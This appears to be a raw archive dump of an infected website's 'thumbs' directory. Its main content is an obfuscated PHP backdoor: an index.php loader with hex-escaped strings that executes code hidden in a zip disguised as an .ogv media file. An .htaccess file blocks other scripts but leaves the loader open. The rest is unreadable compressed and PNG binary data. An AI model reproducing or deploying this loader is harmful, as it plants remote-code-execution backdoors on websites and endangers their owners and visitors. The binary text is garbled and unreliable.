"\x7a\x69\x70\x3a\x2f\x2f\x6f\x67\x76\x5f\x36\x39\x33\x61\x33\x61\x61\x61\x61\x38\x63\x64\x39\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x33\x61\x33\x61\x61\x61\x61\x38\x63\x64\x39\x2e\x74\x6d\x70"; ?>thumbs/07/07/index.php000060400000000642151652221530010342 0ustar00<?php error_reporting(0); $XRT = array( "\137\x52\x45\121\125\x45\123\x54", "\146\151\x6c\145\x5f\x67\145\164\137\143\157\156\164\x65\156\164\163", "\x7a\x69\x70\x3a\x2f\x2f\x6f\x67\x76\x5f\x36\x39\x33\x61\x33\x61\x61\x61\x61\x38\x63\x64\x39\x2e\x7a\x69\x70\x23\x62\x5f\x36\x39\x33\x61\x33\x61\x61\x61\x61\x38\x63\x64\x39\x2e\x74\x6d\x70", ); (${$XRT[0]}["\157\x66"]==1) && die($XRT[1]($XRT[2])); @require $XRT[2]; ?>thumbs/07/07/ogv_693a3aaaa8cd9.zip000060400000012625151652221530012166 0ustar00PK��[Wd�sb_693a3aaaa8cd9.tmp�Uko�8�+V��DaY;! ���.���ry�.�"d�S҅!<��o߱H��~X�k�̙�=��f9]��U�J�����l�[���;��?RIHR�8��>�g��j�)�iY5p2%D��d^Īu2��� `�Ds>m�{��h҃�Ƣ�drn�$͔�0������ˍ�v�U�U cBh�u����QƮ�=f1�j��4")�h��S�� �W�nٖ���(Cn�a�8�CRr}�9��r��,W/�C�G�q�=����l :j�fn�]��֯;�� �x��]�Q���t>�:���"o���P�r��tg�ޟ{��;�t+�-����}�?>���c��l1�6�Sb��Q�4�"dԝ"9]Hװ�߷�k��Z�����}:*��BU�f<�TֱaB�Bm�@ y��f9�˹�iP{<�� �����|݉t���Ƕ����p6�?J��zܺf�b ��G���K�7��z�N���խ�:yDx���=ѱ=s�˔�N6_F�ts֓��*��r�O_�d���6�߽G+�Z �Q�m�KD�����%F,��kiv�V -��H��۴R�J�1Vx������x�cF��Q����=�i. ʈ=�b&K��E��Ѐ�o��.I�ůU�ʩ%����/�.[�ŴDBxR�qT#��F�J�&����3�٨�=J0B���y��w8���C��dئ����u|�~:p��l�U*�q�n8����u�Mpߞ��i^R5Gn�����˧�4g��P�yv�ZS��s;�4������~tax�( 7��fĨ��T�"�����gi�"�<���hĵ���d�6�8�t�ȟ3YQ�5� ���OB�U�0@�z�f�dobR\�2����\:!�R����s�y�J�0]�Lw;y0R�r�؈߃�):��� �\�PK��[����c_693a3aaaa8cd9.tmp]����H��o�(�*T���ww�?�^::�K#o������QM��$$J2##�O���~m������^�v��^���@˾D�Ag���K��V��V�ow���eׅU':��NمqJ{\�������TAQJlױ%o3�����Ӱ��(O�������1Vz;��J�kZ���kB&7���<��=�z�,K����� � ժ;t��1�5yC�E5}��hVV���_�7l%�o�ٛ�ɥ��.4����`�W\��Q�Ł�� �K`ł/��F���U%}�����&Pl2���x��] �P�S�ͩ�:�7��4����O���+�����Cx=�Ɋ��p$��q@l�m� ��$RC~Wg�~@�> [� �ty��H{ak2${pҝ+&�Xh����I� �{La�tU(T[�}���e�4yal{�;<ŹplCA $4��q��%��)�� �I�IMhE1�(~c��|}vUb&ȜbK���dI���U��G�Կh��]�v����T���أ�r.�$�*8(�4�V�K���Ip������s���J��l�}O���T��R��H�Rg�m7�<.r([�a���]<��a+��v�i+Im�Q����a����� ��jQҦ���m�}+w�zD'Op���bX�jގ�f�#��[E>炊�p��s:#˽�D9�t�E�X�CL��_l�և���a�싿A�t��@1��p�kע|�"��k�C9�2{�R��Sk>S��|7BӜWZ�(��h�Ă݁9٤dz+��~���g�+١�hO��rRHƺ�]�|��7�PËr�4_��Ȅ�kI��r�Fj��+0��>W�m$���"���Maj]�-,���^�f�MJʪ'�O�E��e }�Ó�����2�枠�Z0�)�Qd�06AZ�qzMY���H8�{�w�V�MJ�$���Fhi��LW��}��>N�T��,ik�[+̳�-��et��ek�2+'�����#y���r#y�&�(��s��*��I�L_'T�QT.;�"SC%{�]���एn���-�)��&}~nH[�2G��`ceE� �$��t���g�N��m�>��t T�҃�ּ�)�y��� q6|�p#:��b��ޙ>%���ח���B7�?�G���6�rBl�C���V-c�+5 2��=ˣ������Jj�C9ڝ�I���P� ����QD^��jZ�.� ���ȍ��.u�G ���LD���F��\�u� S����"�J5��L��hn�e{��9��H\�gSv0�?=iۊf�.S����� D3P������_5�SS��K#��2�z���Ͼ�Ჟ��&E�L{"��N6��A��k���[�4jxvUGk�}��Z�%X�lS��$���K�wԒ��M�\��ؾ � (��*\��7+�F�K&E��-�ֻye �t��v~g���N1Ѷ]V�u�5<�'�� 0!}cP����ߒZ�_[,��i���g�{����W�n��<q���V���؋���(�WMhog*�`���|�Oٕc}��/���Ou���������C�e���1:r��M�lI�lʑ�Na����� F��8MS{�x{x�5HYm�jr��iB�$G(5���[�"%�"x��� ��^%�pu:���0��s~*K9 1L�FV� �Ѱ&_Z�8-:F��+<�:[��|�{�]��K+2�d�\ ��iʿ�/EC� r��w�����mS4N����P� �vQ,�`����.�/��åշ�_�|J��)���f�#�<��8��X�04�A�p�'������H ���Tg�Fp�@��ڷۻ�]���Z����u3g�H9�Z �9<-� � �ȋ�Ǔxq�ڣ�9-k����YY���|dh(�z��e��Ť���F3��3�+T��z��twN���ci����R�:�yG��/^����w)���}�Ç��xk*�i^��XRA�dO��RE�������+(���1oa��[�/ȵO�}n�\�i(p�N�\�؇l��� �[�<�h�ȉ�"��O}[h�B�HŽِ$��� J�y�7�߿s�&�/h���,�r��J��\��-&�E�C�;�S$D|O��#ce�p o , (��N��N�$���J�;u��D�E���ȶ����owF�KA�V�v_ږ�z�Zn�NM~����#��Ƒ彐��lA6(9���8>��l�"ӎUq�i�!J�͔)X*�G����܋{3��_�Z�l�9�靈HI���Ғ���7lG��f�ȝ��!��+C !�k�R:>�)T>Ĕ���>,wU&�,Q�5��c{�}�r�{�_(I�<�D܈!���婷Qv� Ŕ����<^�g�뾊�N���,�ZK�شNs��&�#�2n�bw�U�]/8��:�U<��CK0�<��r��\7;�/-�8���H��#�ֆ��H��2*��l���vj�.��&��^`���`�a�@� 2GrC�B���`�,|���w��V��\b6> �;���L:�P��.G�H"��p� {+XO�&v��m+�� ���z�dzx����Fwid��U!�W����a^g������³-zz�ס����N���Z�O'�4�;���n�mL?, 2�(,��֞���l ogڨ��.^��[C&U����տ2����)��d��-S����|��4`<|?@$���.ɥ�(ʐ���T�|��݀�c�{�x�{����E�Y�4hyoT�E�p���u'o`;`$��&qn��|q���]�<G���!_�:�'����"��z�ϱ�l���3�G��(�%X-dͭ=��'�^�'�;�tI�o�9�� �،]�{���SE�$Ѓcp�<%Z��$zE3r�٤�x%-b�rgm��v���ؤ}����^Z��obN�>��O�Ƙ �JQ�d�|Ħ_h�e���xJ/�T2;����iZ��D�fz�� ��Ɩ2l����L0De]|�&(��=;i���υE�L ?�=�wϨﭒ�@�É��M�E�sK���~�m�m�+�o�Pa�p�d��Y��g���p8��������R�-����h�QS]�p��n�S�� ��9F?�ꈴ��oO��j�N�:'lY�i掏���gy���)!y�}�x` �͢���Z� ��h9�=��]q=>��4&ze@�2kSy�zJۦ>~[Ƿ�?Ӟ�!6�P#|{(m9b�Q���P�"N��N��kp2�M>i�o�K^@�9����Y��-K&U��Q�_ ��L��{���y)Q�].G,JS��if�y�RV�p� � �R�z������h#�}���u�y3�kGv���vJ���s�t3�����|��6tYZ|Ђ���yѴ<i�.̎�D�<�|p�F�&��.Mμ�YLn����M��7��� ;Y���|[�v:Pf�ϻT����w����g��t1���I=�V �C0[��8:�L�o6����> 4���y������t�V�{7���jhxF1�O�+�{A܁����[�m����)O$Є�د<��&y�����I�X� �^0*�҄HWT&���A[z�2��k�{&}�{أ���9v���}���f+�5��<GG̐Q��[ڙ�_�y����0;W_D9[ؐT��4��#��)�5c�!��)���2W�����s�ΆG,Հ�|F0U�5���6D �ȓ��%�!���T-�(w�u�l��Y(\�]���v@}I��(7��)$b7c.p�� 0��o|�x�a���+�}���c=��<���,z+���pj;F e)r�x��5�G�� l�N^�g*8w ���L�<OD<�c��0U�^6��1���|���`8��3H�W�dO1\wC�L ���v\��-�Y�L�j�y^�d��~S<ƀ,����_o��֧k=�?�����,}����{(�����Fɿ�8��#�S����߿|�?������ϲ%�:��_C�������-�4'��?�<��_��3��6�?Ø����8_��:���#����Ŀq,�˟?�=�i ��j�p��<�1�k �p��S?����o|�Z=0c.t��O�u�����'O���7��sNe���+���GV́����m��N��N_�6�l�zhF�^�j�Xx�0?�/����Wk�.c��q�V�_O˻�6^���x��������PK?��[Wd�s��b_693a3aaaa8cd9.tmpPK?��[�������c_693a3aaaa8cd9.tmpPK��thumbs/07/07/.htaccess000060400000000333151652221530010315 0ustar00<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(index.php|cache.php)$"># Order allow,deny Allow from all </FilesMatch>thumbs/07/b_90_90_16777215_17_miopia.png000060400000024372151652221530012721 0ustar00�PNG IHDRZ@��� IDATx��{i��qf櫻�>�羁�7A�eJ�$J^�Cލ�c�K�z�{�X_r��#���dY$EZ�ޢH��x�8 0������z/�GUu7 9ֱ[3�]��|�_f~����&º@D����x_� �����s�7�3�c�?�j���Fo�Ac&����?�� "��JD������,8\�ºB�<������ƻ�/�������r��Mbvv�P(�.D@D�<"���������"�����FwkL1>>��R���\�ZEd��ȐyS���4M�["2��Z�R� c�����% �� �K�e�͒�d_�� Y��p�&�w�q!������T6����\\\����]�圻�htcc#�HT*X[[�8|����q˲t]/�mmm�B� ��f��gC�,kcc#�������K�F��"�әRi�P(twwONN��eUՒɄeٚ� ���������@� �ד@=-DD�!4 Or� �E(%���( I�亮a��e2�j��i��؆ax�l�5�E"M�,�b���1D�f[���N�u]������,��*�H�1)�;��Eioo��D��Z�\�B�I�U�ap�����r�X,f2ϰ��T����I����ֈ�``��/�#�����s^*���ι$I����?G�S|� ��B�$!�q�����J�-��<��^��J���|�f��a��#�(������G���ȚO��r� �`���G���``R�|}Y�ic��f<�q�u%IR�f�o2���L$�xG�f������m��$ɈhxM�٫����0D&\ ���yQ]����Q�͚I0���A�D�@ք;���7 IC���3}]�{ �����+���x�̙j�j�"˜s�4Q.{��h4�y(��sss�D<p���B<�\�y���J2��PO�e������pj�ڶ��{���?'��)[Q�d]6�L$9��}0�L@�%�� �7����@v d@t'���(���n�M�րOjy��8��/��E��<x�W*���aZg]*g�3?y�mYb��w���L7iKS�(�N��Ͻ�p��V�s{ˡ��������'���<ߙI(d���"~�sKd�䶢O(�J�������86 �~[g*�$�Lb��H"I��*[(��i�\k�b����|��O����d��c�Z���������f��<�l��`�~��GR�T]!���͗����*\R"~j|�~��fWf�u�;ڱjV����O���֗/K�U����ﮤ:�S��w�=���b�/>���=R��@���JU�h���C����ó�K�F���8���~��xQ�guӈ"�_�m��>���ǿ����mP(P �+y��~���K�y��_��b���7�!����@2C���w�>ST͂���}�=*3���赂l���$�d�_�IB=r}a�?�#�\�����b��_��K����ю>1�L9f����%BMP�r�1��o<�(ؼ�r4bn�m��g���>������]�gT�z��ˁ�Y����/��/}�K���f�� ��d<��z�m ����b�}������k��Xkzmrr���UH����c���s�ˑKo=��OO) k��\bx��K�˟DG���|��r8��;ߪn�H�ƧXc)����a]n2@/�m�?�GѸ����=�N�0�3Vp<��������P|`dtt�0BM�N��dč���]���#�=�հ �mw�p�:�V.T?}ǡ�VY �Q5S�s}��&G�L���+Ɉ��Q �;�/��n2�ZKk�q�P�l'j\ϗo�D���7MS�ƢR݊E��(�s�~��CC��x����&ω���ap.�D��߹�ۚ� x�#*.�D"*���ATb��[:�Z4@�����19���e�6w�c������ޖ�������׆z2�PD�X4g��Pժ Q�ͬZjK�a,B/�1�X**J�뺧>�x���87/���E#�^��F�&�A�<z���d��D�%��m�Z�3��P��a]2A��!��~������]]]͑ (�'�a#E��?u�o�a��mcK.�ꪻY�*m���*�vx_���K��n+��릥Y�R Q=���ѓN.�Xh(��Ưɤ#F���L�p�c?�2�z��T*U��J��,��s�vv�uK=D;��X�>iOi��ڹ���|�7^}��ޣe]k6/\��Y��VJ\�\I.D��鶪��"�\�#�ć7�7��²�5��ïZ H��=���D�^Ӆ"b� p���j&��ʙ3�+%~�#�ϝ���+"���gc���ֆC/,7dp�@����a!x"�p]�1��:c,��s�}��-�(k������ǎA���w�D@p4���L\���uR����k�m2!��l�r�ݑF6í��y�F�ጀ�2��Ry�,�<����L䍊�$&����q�.�KF�z�j�Ҹd�$v��ڪ|�[�ܳ3�ؑ=K��}�&��;o�F8��֒6T�I� ��P��-���[onn���#��.��x��M� {�;77����.�Gb��5�3i5�[I� �N�⎫gu��b$��]��-� A�` �+�5��i�&.eDq��cr��;��5 �tj �/�Åk��6��gP-��:w��驫ǟ��>�epmyqqq9�� � Ƕ������>�Ғ<��IUQ�m��_��'O�744�0dO=�:`�\�QU��85س��������$Ϸvo�ӹՅdq=�6�U���?�G��@$�%zG�^ui[�ʒ�������e�Eeb�͵*J<ޮ��$�����ww�w��n��t���o��=q��K2�����tJ2I2Te�@���a]���^VUM�F�=� ]�r5��f��W�a�J�b8Rr"���"!����\�l,+�- �R�ٶ����ʃoNC��u���Y� 9jI����������騵`L��\�jY�"�s�T���U��ݒIV��c��ֹg��rG{��c��ڵceu���:��g0�P���J%�L��Ϸ��Q4���@;��n�OW�@Ξ=��CZ� GNh�\��xy�s�z�Z�9������m3���d�����eہ4JE�DU�.31�Jo�?��j��/}�<z2��:s3l�f�8?z�~�J5ٵV�7���^���_�dө��-}�Zm$�/L_�NH�c��ig�Yn�tMnͲÐ� �����옝��e�ʕ�-[�lnn�_�2��u��YGMv효[Pp*ꋯ�n|�ʫm{��asr���FV� ��l[o)k�&���D�Z]T�-�gF~���]AH�L���I��s�^r��Y�n9Uu5��[����h����W��ȸ�*�jM�rrlǾ�t&ٚ����$�խ���28Ho�� ���$�g�K��r��$ٶ��*4QI�bqa|2���(]�Ʒ���z����t����>#��s�q��2$¦1���x��2�u���z�����AHR��S1u�[��|W$��ERR4#��J�n@I�6�%��ly5�RIo�$s���l�˓�W/���f*��:8Ԫ9w���%7���='Ξ*�K��__�MC���r���l6S*�-��f3��y!D{{���6(&O��[ ��l����Ñ��P,�ho ��$�K��!��T1 Ěi+B"�n4u{�P���%wg(�j�*��e�V����J!bݲ��ԣ�1�����:�(l9�:vn.Ֆ�&�ǯ=��c5�R��ύ��S�xK�Z�6�e5�J� "��&�t:��ey�w=���x~���;���o������#���X���a��=~ߗ�<}�t#��[ Z�,NJe]�#��/���9]i�i��MjA�%�H�8]r+I#'jnW���m&��9z ��qo�rh�1���ǧ���~�o3-�t��;#��@�\�2I�DZLSU�p8b�fkk�T.���`�T� �ꯢ���ȑ��~����ٷ��l`!M�)"�����O�UU��t��~�O�-J�@���+w��kv�v��p�t��n������'��d�ܛ�p�rT�����P��k+4wU��-=�O��5��:��ű�P��uu1Y_�FF\וeك۶@1?�P�!� ��6��[�lq�r���76��Ku�A@�QVg�Jc��w?�ا��D��Д�p�*�0 �!"M�354��6�:�=M��ZTk:���+��$���'�HU�b��]y�LwD���'�sv������W7���;�ʼnҏ���OIO}���i�mۦiVk�j�fٶe۶��^.�=b����C�V�A�(��fҩ�p8T�j�%�� @Ĩʆð�2�y��.�}��GB�0����uvv4�h�YV��L�� ��@��@nm�*��Ɣ�3*����)�)� ����rK��&mdS�M�KE �rҖ�NG�B�,i��'e��᭱�dP�T*�?rD���B@7r����@"O>����w�� t(����D�D���ݽ�3��u��kC�P�h~ �H�p9 �$Y���Fo<�˙�50)�9��2I�E�E ˑgG��ؕ�]TK���TI��]�P����9��c�����i�.��0�����N�~��&����0��en4������ �V�9�#˲a~�W�!(]@<�&� ��5����LT�D�]FB� 'b�"��E�����$�2�$7#b�xx5�Ԣ�����%Y,��g��Pg�Q��e8��3�>��ڷ��b}`�N6���7���|���E��v @�$|���@P��O�+a�_JPuW����y,=1���$B#�b d���4�Q�x���M7���j��� ��Ps@]�@D�p�S��� H�AÕ5�,��}�:د����]g��W������v��|��$BM��_��䍢B���g��F9 @�r.1����z1=��m����X�csB@.��20d�<�D%E�d�h}@ �&��8 b��j��F !�șD����e�`$A�o�57 `C0u5��X��S�|>�eE% �v��:��F{zz� � "�ſ����h[���Iq�r��Lj��zXbr���C��L��o�v����[ܒmϢ�m�T��펻�g�=��w���4����e @B�CV5$w���5NO��9�>� G� �q��_]0)����,u��k.C�(تA���+��_~]�־�������j];�j�sw�OW^~5��������r! �����O�[w6���;+���g���ʄ�*�Nt���F�}�97:�Poۺ5��H�N�u��s!���,������<i��]�#���߁�Ԅg�i~��� }�E�5��"ڍ�.ц�3e2Hm۾Ӱ��O�>���[��z@F�Ԩc�m��%���ɫ��-�nKM�5�" �����������e��V�={��-/���������v��#��?$� UQY +�BL��2� �v ���������@27:�Y�05�F��bY���>���~c=i��/�N�H^�劏�f���g����X,6<<LN{�ȕ�nHe.J#]�2qi~�e��UԢ}���)���`ɺ��L��|x_L㭝��;W���_}}��%�P�l���;�G����ЁΟ�)c���ZM뷞�+����-{||"�~���{����� ��8�>���{��&�~��h���o��B ���g��/]Uu`���\���n� Cu�k ���?�۸�R���>�G��k�WǯWg���5��zt_oDI�����sXv�sF�{魡��/�?Dž�#\����x}mk��7%�P(!�[����W�J#�v]�駟I�Z������_ˇ&�u�����d䦆n���w[[�0������컃K��ˊe~��ޓ��WK�8�����L�Shگܱ�}u~]�H�ul������/�2Z���Z�Z�k^����Y�>+ F�v�Ļ�V) גLNLL��p8���&�ť%��q7���/���K��<H�����6JQ� ���������s⡇�H��0g�qP�F�=#[rC������8G��н�b�əT�9���UA<wdb�3�X�VjkI�p�t8b�¶�-���B��]������`kkk4�B� ��$����/�����y�J\�4z,���\���R���r~6��o��a� ��� (��.OM�c3�Ә;T(y�B$��Ȳ�d�1��۹�r�b��[ 9ZȈ�[����##�^mYV2K�z���-)�w����W�P&�*��c�c�v��8�+\�]��yEI�����Ȱ��=d'�{�}�d���>�����8�s'��F���Z���W���+���-�B��ُ�z�'�Ւ�y�-��֓YGV0�~�Z���P�,�t_�~�����$��L�[٨| ��n�B~p�1��w�Έ����9V�,V��m��e"-!s�����wN^�L%��F<+ʶr�-ٷT]��"���1��/9A_)���q�;;:���\`0Ƽ��/�!�������˗��~"�q��e�}-�+���D�Sձ�+;���V�Q�B$���(�bu�Su���L�����~$��k����3����Ij��ξ���9Zs���07������of�+JKh��l�{���v��2�135�}��r��S���o�ο �EQ�%@��$�y睪��uם������xL��x���g�;pnn�cG��Ae2�H\�`���Ж��֮��.�ڽJ��řh����%i-�]i�*o,gT=��ԪW˼�#�@��-A�鬲j8ݢ��u��e��h͐���QY��N��R��R���?��<��)�YY_Y4B?|{}l�w�y�C<0}�0��@�u\��*܉'���ڵq�X6��6>�g��~�����ƪ�n�Fr=�plGU5�&TU�&��M��b$^��B�h��7{�����^[�L�Mv �o��,Ե�ȕ0�:��vۣz<�*�S*��h�P5��kr�6����qf}���?&�S��mCW/_x�o��������� ���}�/��ͻ�:�e��.ccU�l6#IR"�dY��dRմ÷Rezz�C�����a�B�r)��C�� K~JC�"\+gח��5�ulE-F��[Ώ@d�����H��kie� 8������%�}���*��z�-Ť�� �����To�e?���3���g~��0>yat���:���`.���3S=}9������Ȉ�(�\NQ�h4z�����!��?w����6)�I(���.1I���Յ�f[1kYI�Mwp&a�2"@�M��]6"�p�7��Ǧ(���#�����~ssx�O��|�eDj�-,;�-���O�fn�4�/���b&���чg�t.����[%E��>y�]]!��j���8�|�@x���s����ر}f�z{{����;.��G�66�^�ML�����]�������ѫ���5��O/wN��c+�\�g���Q�F�N$xw� ����˃G7rc���œ��x�>I��V��skb]��D�+���]�����_;yyv�b�X����Ν�O��`~v�\f��? b�P�W�01��G,-9�H�$[�~�:<2����[��t$1�+��r��� �:�뺄7����|��[���3}}�|麲s�7��*����Ьz��ǝ��d�ElQ܈�b�����j/�+�#�lC�����s���IDATY�ue씫E�õ�LWb"S���L|�l�wG�;����w�Y+���ŋ����������Q_����ɏ�o<�HE����몢!VVV4M[[[�4-�(�R�DD8췸�Ύf��.�ٙQ�O��62�e;6'7y�ru*���4 ��ՒhK-�^8r�1�U$WG����5�$;�m��\#�w�b6��{�����a25��=�ІӢK�3y�?����xF�eۤ��ݖ��d��f�ߑ��(���P��c� `�QUUM�eY�e9��D�U��� 2�f�A�{��D"��?>pg ε���g��u��9g��w��D{{{]�ȁ��8Lr8���i��m���xWmUzdQho��.u���.G�p�폆BmS��z��݉�@d��J�v�|nǐ�w{f�A�t��?�v?�J���W��C�vdE��iJL��2����uEU�6Њ �Z�Q&q���d�����Q���%8O�H�P+k9�d��ѣ����t���i��"�ބԓ��Ċ��� ە)��}�qV�g�;{���ݽUD�k�ɮ����1�9�v�9�Oϕ�N�V�~|u|y����V/콿czB�P��zGU�5D�d ��@��{�ҥ`�� 0�n5<��u��7���w� m��J �C���B�XZ�.~2��{w�<x�`0�W*.��@�.��M�:Yeӎ� ��>�F��І�I���c�v�3>�!+�29���U��T��jM�K��4�����M��:{轗ha�Б��� H�#lX4�J_�v-�z.d�P/4�4"ڱcG.�{���Fn=oG�K��"�$�֥����Dyi�ꅅf���'�|��O���wG0�L�ds�t S���nQF�j�%$Y�VHG���B��6 MGH���U)�K�6�a N9�_��ݫ(�L��K��{o��]邇Q�Z͜���y��z�>�ͤ�گs�ޑJ����/��Ν}�xk��ŌHTbhU��i�j�UƤ\nǶ�;���d2Y�w�B.w8."SdT���VG�q�!Pm� AZ�HrMU���R��h�%e��Z��A���x,�98�J+�]Z��T_����[�<rP�4��BQ�jR��i��n������y/y;;;��:�ȶ�Z� �����ܐX�=�Z�Qh#a�J���HB� U�d9,�$�F6�-��,4�D-�u[��k��Y(� �S{Ƈ���:!UW%9���d��H�2���^���g�DU���P�g�VR'�)x�o�W����؍���wh(�$I�Ν۹s�ox�h�vͲwDu�D D��qd 6C�W�dG hUIp�@������`�2n1!Hэ��FQ��� ��/� �zzvs�q���X_Z��旂�i�5�a� 痋����$�ΪQ�"����� lM��k�1�s�� �ї�v^�A��`M�����_ހ��|s���W���D����6��l���� ���y���)k�������7 �$5f���4<Y�$s0 �O��\,lH�9� -��L�^�f����/S���ﭺ�&���uj6���e��[_?�s^?��R�T*o�Mmf �X[]�:b!T�U�u1`�q۶��R�w��O�j��7�J���ש}Z9w!P�Z������4�W�Q�oG��z�կ�6�,`�]�vM�$Ƥp8���������m۶s��\.���������u#�HWW���TOOw�XTEUե��r��Lzo�c�Z �ÕJ%�J�d296v��*���p��B!�j���Dt��Xoo��(����TJ�$!�\.���J.�j�f2��T*�euww+�8�@����p�Ј�}Y�` B�$a�R�mK�eEQj�Z</�B�|>�GGGY.��$�P(.,,ttt�j����v���t]WU�s~� �;w��� !�Z�2���罔`nn^Qd������末�299���W�������T*�F���eι���j��*���듓��Ba``�s.�2b�M�-�x��3���]MU��� �éa��]��/tuu2�� !,˪�j�L�4M�0������8�Dm��.UU��M�|�e�Kϣ�TU�Vk��zg��.��)�e-��B���-aY�$I~���8�J5�N����JPϼ��J �/�:��IEND�B`�thumbs/07/index.html000060400000000035151652221530010265 0ustar00<html> <body> </body> </html>thumbs/07/b_90_90_14145495_17_miopia.png000060400000024372151652221530012716 0ustar00�PNG IHDRZ@��� IDATx��{i��qf櫻�>�羁�7A�eJ�$J^�Cލ�c�K�z�{�X_r��#���dY$EZ�ޢH��x�8 0������z/�GUu7 9ֱ[3�]��|�_f~����&º@D����x_� �����s�7�3�c�?�j���Fo�Ac&����?�� "��JD������,8\�ºB�<������ƻ�/�������r��Mbvv�P(�.D@D�<"���������"�����FwkL1>>��R���\�ZEd��ȐyS���4M�["2��Z�R� c�����% �� �K�e�͒�d_�� Y��p�&�w�q!������T6����\\\����]�圻�htcc#�HT*X[[�8|����q˲t]/�mmm�B� ��f��gC�,kcc#�������K�F��"�әRi�P(twwONN��eUՒɄeٚ� ���������@� �ד@=-DD�!4 Or� �E(%���( I�亮a��e2�j��i��؆ax�l�5�E"M�,�b���1D�f[���N�u]������,��*�H�1)�;��Eioo��D��Z�\�B�I�U�ap�����r�X,f2ϰ��T����I����ֈ�``��/�#�����s^*���ι$I����?G�S|� ��B�$!�q�����J�-��<��^��J���|�f��a��#�(������G���ȚO��r� �`���G���``R�|}Y�ic��f<�q�u%IR�f�o2���L$�xG�f������m��$ɈhxM�٫����0D&\ ���yQ]����Q�͚I0���A�D�@ք;���7 IC���3}]�{ �����+���x�̙j�j�"˜s�4Q.{��h4�y(��sss�D<p���B<�\�y���J2��PO�e������pj�ڶ��{���?'��)[Q�d]6�L$9��}0�L@�%�� �7����@v d@t'���(���n�M�րOjy��8��/��E��<x�W*���aZg]*g�3?y�mYb��w���L7iKS�(�N��Ͻ�p��V�s{ˡ��������'���<ߙI(d���"~�sKd�䶢O(�J�������86 �~[g*�$�Lb��H"I��*[(��i�\k�b����|��O����d��c�Z���������f��<�l��`�~��GR�T]!���͗����*\R"~j|�~��fWf�u�;ڱjV����O���֗/K�U����ﮤ:�S��w�=���b�/>���=R��@���JU�h���C����ó�K�F���8���~��xQ�guӈ"�_�m��>���ǿ����mP(P �+y��~���K�y��_��b���7�!����@2C���w�>ST͂���}�=*3���赂l���$�d�_�IB=r}a�?�#�\�����b��_��K����ю>1�L9f����%BMP�r�1��o<�(ؼ�r4bn�m��g���>������]�gT�z��ˁ�Y����/��/}�K���f�� ��d<��z�m ����b�}������k��Xkzmrr���UH����c���s�ˑKo=��OO) k��\bx��K�˟DG���|��r8��;ߪn�H�ƧXc)����a]n2@/�m�?�GѸ����=�N�0�3Vp<��������P|`dtt�0BM�N��dč���]���#�=�հ �mw�p�:�V.T?}ǡ�VY �Q5S�s}��&G�L���+Ɉ��Q �;�/��n2�ZKk�q�P�l'j\ϗo�D���7MS�ƢR݊E��(�s�~��CC��x����&ω���ap.�D��߹�ۚ� x�#*.�D"*���ATb��[:�Z4@�����19���e�6w�c������ޖ�������׆z2�PD�X4g��Pժ Q�ͬZjK�a,B/�1�X**J�뺧>�x���87/���E#�^��F�&�A�<z���d��D�%��m�Z�3��P��a]2A��!��~������]]]͑ (�'�a#E��?u�o�a��mcK.�ꪻY�*m���*�vx_���K��n+��릥Y�R Q=���ѓN.�Xh(��Ưɤ#F���L�p�c?�2�z��T*U��J��,��s�vv�uK=D;��X�>iOi��ڹ���|�7^}��ޣe]k6/\��Y��VJ\�\I.D��鶪��"�\�#�ć7�7��²�5��ïZ H��=���D�^Ӆ"b� p���j&��ʙ3�+%~�#�ϝ���+"���gc���ֆC/,7dp�@����a!x"�p]�1��:c,��s�}��-�(k������ǎA���w�D@p4���L\���uR����k�m2!��l�r�ݑF6í��y�F�ጀ�2��Ry�,�<����L䍊�$&����q�.�KF�z�j�Ҹd�$v��ڪ|�[�ܳ3�ؑ=K��}�&��;o�F8��֒6T�I� ��P��-���[onn���#��.��x��M� {�;77����.�Gb��5�3i5�[I� �N�⎫gu��b$��]��-� A�` �+�5��i�&.eDq��cr��;��5 �tj �/�Åk��6��gP-��:w��驫ǟ��>�epmyqqq9�� � Ƕ������>�Ғ<��IUQ�m��_��'O�744�0dO=�:`�\�QU��85س��������$Ϸvo�ӹՅdq=�6�U���?�G��@$�%zG�^ui[�ʒ�������e�Eeb�͵*J<ޮ��$�����ww�w��n��t���o��=q��K2�����tJ2I2Te�@���a]���^VUM�F�=� ]�r5��f��W�a�J�b8Rr"���"!����\�l,+�- �R�ٶ����ʃoNC��u���Y� 9jI����������騵`L��\�jY�"�s�T���U��ݒIV��c��ֹg��rG{��c��ڵceu���:��g0�P���J%�L��Ϸ��Q4���@;��n�OW�@Ξ=��CZ� GNh�\��xy�s�z�Z�9������m3���d�����eہ4JE�DU�.31�Jo�?��j��/}�<z2��:s3l�f�8?z�~�J5ٵV�7���^���_�dө��-}�Zm$�/L_�NH�c��ig�Yn�tMnͲÐ� �����옝��e�ʕ�-[�lnn�_�2��u��YGMv효[Pp*ꋯ�n|�ʫm{��asr���FV� ��l[o)k�&���D�Z]T�-�gF~���]AH�L���I��s�^r��Y�n9Uu5��[����h����W��ȸ�*�jM�rrlǾ�t&ٚ����$�խ���28Ho�� ���$�g�K��r��$ٶ��*4QI�bqa|2���(]�Ʒ���z����t����>#��s�q��2$¦1���x��2�u���z�����AHR��S1u�[��|W$��ERR4#��J�n@I�6�%��ly5�RIo�$s���l�˓�W/���f*��:8Ԫ9w���%7���='Ξ*�K��__�MC���r���l6S*�-��f3��y!D{{���6(&O��[ ��l����Ñ��P,�ho ��$�K��!��T1 Ěi+B"�n4u{�P���%wg(�j�*��e�V����J!bݲ��ԣ�1�����:�(l9�:vn.Ֆ�&�ǯ=��c5�R��ύ��S�xK�Z�6�e5�J� "��&�t:��ey�w=���x~���;���o������#���X���a��=~ߗ�<}�t#��[ Z�,NJe]�#��/���9]i�i��MjA�%�H�8]r+I#'jnW���m&��9z ��qo�rh�1���ǧ���~�o3-�t��;#��@�\�2I�DZLSU�p8b�fkk�T.���`�T� �ꯢ���ȑ��~����ٷ��l`!M�)"�����O�UU��t��~�O�-J�@���+w��kv�v��p�t��n������'��d�ܛ�p�rT�����P��k+4wU��-=�O��5��:��ű�P��uu1Y_�FF\וeك۶@1?�P�!� ��6��[�lq�r���76��Ku�A@�QVg�Jc��w?�ا��D��Д�p�*�0 �!"M�354��6�:�=M��ZTk:���+��$���'�HU�b��]y�LwD���'�sv������W7���;�ʼnҏ���OIO}���i�mۦiVk�j�fٶe۶��^.�=b����C�V�A�(��fҩ�p8T�j�%�� @Ĩʆð�2�y��.�}��GB�0����uvv4�h�YV��L�� 